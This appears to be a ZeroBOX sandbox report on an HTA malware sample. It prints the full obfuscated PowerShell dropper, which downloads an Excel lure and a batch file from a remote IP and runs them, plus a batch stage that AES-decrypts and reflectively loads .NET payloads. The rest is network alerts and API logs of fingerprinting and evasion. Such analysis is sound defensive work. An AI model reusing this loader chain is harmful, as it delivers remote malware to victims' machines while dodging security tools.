Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 9, 2024, 10:59 a.m.	May 9, 2024, 11:01 a.m.

Size	13.4KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`18dbd534f0a9f76cfb874a7a7e688c90`
SHA256	`c39754c0eb845d1fa60618c95519d430fef1d5e537baf83f63a67c8b0ef9c709`
CRC32	`3BAB9CBA`
ssdeep	`384:17RaKJD8W7aauapKCE+1GW3lglBTlp3WzlmjlVgbC5972:17RaKJD8W7aauapKCE+1GWV4Bxp3WRmg`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\.hta
2552
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAllBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRoU){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $True){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Process $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfgDIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,59839,59880,59877,59873,59882,59888));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgDIPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKiZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaILzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};function wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJapJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxSzqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59841,59892,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfCSvt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoAMd + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcNb;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884,59830,59819,59819,59821,59829,59823,59818,59822,59822,59822,59818,59829,59826,59818,59821,59824,59823,59830,59827,59822,59828,59827,59819,59892,59892,59818,59870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf;
  2644
  - EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
    2812
  - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\xx.bat" "
    2980
    - cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xx.bat"
      3056
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xx.bat';$BMbC='RsHpUesHpUadLsHpUinsHpUesHpUssHpU'.Replace('sHpU', ''),'CCFZsreCFZsatCFZseDCFZsecCFZsrCFZsyCFZspCFZstCFZsorCFZs'.Replace('CFZs', ''),'FrBDpromBDprBBDpraBDprseBDpr6BDpr4SBDprtrBDpriBDprngBDpr'.Replace('BDpr', ''),'ChAmxTanAmxTgAmxTeEAmxTxtAmxTensAmxTiAmxTonAmxT'.Replace('AmxT', ''),'DMtvCecMtvComMtvCprMtvCeMtvCsMtvCsMtvC'.Replace('MtvC', ''),'LCapfoaCapfdCapf'.Replace('Capf', ''),'ISAmunSAmuvokSAmueSAmu'.Replace('SAmu', ''),'MawqArinMwqArowqArduwqArlewqAr'.Replace('wqAr', ''),'GetKwgmCuKwgmrreKwgmntKwgmPKwgmrocKwgmessKwgm'.Replace('Kwgm', ''),'SplMBlVitMBlV'.Replace('MBlV', ''),'ElayXCemayXCeayXCnayXCtayXCAtayXC'.Replace('ayXC', ''),'TVQktranVQktsVQktforVQktmFiVQktnaVQktlVQktBVQktloVQktcVQktkVQkt'.Replace('VQkt', ''),'EnXNnYtXNnYrXNnYyPoXNnYintXNnY'.Replace('XNnY', ''),'ComQwwpyTmQwwomQww'.Replace('mQww', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BMbC[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zlGLC($RSWKX){$GVeOl=[System.Security.Cryptography.Aes]::Create();$GVeOl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GVeOl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GVeOl.Key=[System.Convert]::($BMbC[2])('uY6F5j209xASZjaoUU93vCCXVRY+Y6fGH5LCH0uNzYo=');$GVeOl.IV=[System.Convert]::($BMbC[2])('iwvv8vpAhw35q7w8nU7OXw==');$QznTD=$GVeOl.($BMbC[1])();$RHHCU=$QznTD.($BMbC[11])($RSWKX,0,$RSWKX.Length);$QznTD.Dispose();$GVeOl.Dispose();$RHHCU;}function lfrrO($RSWKX){$kKatK=New-Object System.IO.MemoryStream(,$RSWKX);$EyOwi=New-Object System.IO.MemoryStream;$oJtRR=New-Object System.IO.Compression.GZipStream($kKatK,[IO.Compression.CompressionMode]::($BMbC[4]));$oJtRR.($BMbC[13])($EyOwi);$oJtRR.Dispose();$kKatK.Dispose();$EyOwi.Dispose();$EyOwi.ToArray();}$FYWBz=[System.IO.File]::($BMbC[0])([Console]::Title);$QpMEc=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 5).Substring(2))));$IyoFy=lfrrO (zlGLC ([Convert]::($BMbC[2])([System.Linq.Enumerable]::($BMbC[10])($FYWBz, 6).Substring(2))));[System.Reflection.Assembly]::($BMbC[5])([byte[]]$IyoFy).($BMbC[12]).($BMbC[6])($null,$null);[System.Reflection.Assembly]::($BMbC[5])([byte[]]$QpMEc).($BMbC[12]).($BMbC[6])($null,$null); "
        2116
      - powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        2068
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
193.222.96.143	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 193.222.96.143:7287 -> 192.168.56.101:49167	2400036	ET DROP Spamhaus DROP Listed Traffic Inbound group 37	Misc Attack
TCP 192.168.56.101:49163 -> 193.222.96.143:7287	2027254	ET INFO Dotted Quad Host XLSX Request	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 9, 2024, 10:59 a.m.			0	0
IsDebuggerPresent May 9, 2024, 10:59 a.m.			0	0

Command line console output was observed (50 out of 62 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: At line:1 char:774 console_handle: 0x00000053	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: + function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAl console_handle: 0x0000005f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: lBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRo console_handle: 0x0000006b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: U){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $T console_handle: 0x00000077	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: rue){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ console_handle: 0x00000083	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrest console_handle: 0x0000008f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: ricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(598 console_handle: 0x0000009b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: 18,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Pr console_handle: 0x000000a7	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: ocess $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfg console_handle: 0x000000b3	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: DIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,5 console_handle: 0x000000bf	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: 9839,59880,59877,59873,59882,59888));[Net.ServicePointManager]:: <<<< SecurityP console_handle: 0x000000cb	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: rotocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgD console_handle: 0x000000d7	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: IPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKi console_handle: 0x000000e3	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: ZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaI console_handle: 0x000000ef	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: LzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};functi console_handle: 0x000000fb	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: on wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJ console_handle: 0x00000107	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: apJpGtoAMd + 'Excel.xlsx';If(Test-Path -Path $ZxSzqAOPdWfCSvt){Invoke-Item $ZxS console_handle: 0x00000113	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: zqAOPdWfCSvt;}Else{ $VbnfWkgMtzU = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,598 console_handle: 0x0000011f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: ,59871,59873,59880,59818,59892,59880,59887,59892));oYYtmcfgNVALjZ $ZxSzqAOPdWfC console_handle: 0x00000143	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: Svt $VbnfWkgMtzU;Invoke-Item $ZxSzqAOPdWfCSvt;};$qQjgFPGszJBcNb = $wPeJapJpGtoA console_handle: 0x0000014f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: Md + 'xx.bat'; if (Test-Path -Path $qQjgFPGszJBcNb){oocZbSbPqugD $qQjgFPGszJBcN console_handle: 0x0000015b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: b;}Else{ $aiJbTZVrclHZrx = jlAPajKrXnXds (iGrhVnKiZYQ @(59876,59888,59888,59884 console_handle: 0x00000167	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: 9870,59869,59888));oYYtmcfgNVALjZ $qQjgFPGszJBcNb $aiJbTZVrclHZrx;oocZbSbPqugD console_handle: 0x0000018b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: $qQjgFPGszJBcNb;};;;;}wwFwRQUTDiTf; console_handle: 0x00000197	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x000001a3	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x000001af	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: At line:1 char:774 console_handle: 0x00000053	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: + function oYYtmcfgNVALjZ($AMoNCQYGRgLRoU, $yowkcxYklFDKtli){[IO.File]::WriteAl console_handle: 0x0000005f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: lBytes($AMoNCQYGRgLRoU, $yowkcxYklFDKtli)};function oocZbSbPqugD($AMoNCQYGRgLRo console_handle: 0x0000006b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: U){if($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(59818,59872,59880,59880))) -eq $T console_handle: 0x00000077	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: rue){rundll32.exe $AMoNCQYGRgLRoU }elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ console_handle: 0x00000083	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: @(59818,59884,59887,59821))) -eq $True){powershell.exe -ExecutionPolicy unrest console_handle: 0x0000008f	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: ricted -File $AMoNCQYGRgLRoU}elseif($AMoNCQYGRgLRoU.EndsWith((iGrhVnKiZYQ @(598 console_handle: 0x0000009b	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: 18,59881,59887,59877))) -eq $True){misexec /qn /i $AMoNCQYGRgLRoU}else{Start-Pr console_handle: 0x000000a7	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: ocess $AMoNCQYGRgLRoU}};function jlAPajKrXnXds($irMBWZFpvuqduX){$hWiCJPXtnbCAfg console_handle: 0x000000b3	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: DIPKdzz = New-Object (iGrhVnKiZYQ @(59850,59873,59888,59818,59859,59873,59870,5 console_handle: 0x000000bf	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: 9839,59880,59877,59873,59882,59888));[Net.ServicePointManager]:: <<<< SecurityP console_handle: 0x000000cb	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: rotocol = [Net.SecurityProtocolType]::TLS12;$yowkcxYklFDKtli = $hWiCJPXtnbCAfgD console_handle: 0x000000d7	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: IPKdzz.DownloadData($irMBWZFpvuqduX);return $yowkcxYklFDKtli};function iGrhVnKi console_handle: 0x000000e3	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: ZYQ($eaILzSbnqJ){$lgMdU=59772;$pkNOUpDlz=$Null;foreach($WtZmnegAvYDwZrJ in $eaI console_handle: 0x000000ef	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: LzSbnqJ){$pkNOUpDlz+=[char]($WtZmnegAvYDwZrJ-$lgMdU)};return $pkNOUpDlz};functi console_handle: 0x000000fb	1	1
WriteConsoleW May 9, 2024, 10:59 a.m.	buffer: on wwFwRQUTDiTf(){$wPeJapJpGtoAMd = $env:AppData + '\';$ZxSzqAOPdWfCSvt = $wPeJ console_handle: 0x00000107	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 88 events)

Time & API	Arguments	Status	Return
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ef20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f6a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064eee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064eee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064eee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064eae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f4a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f760 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064f7e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003630c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2024, 10:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00363980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 9, 2024, 10:59 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 322 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2024, 10:59 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
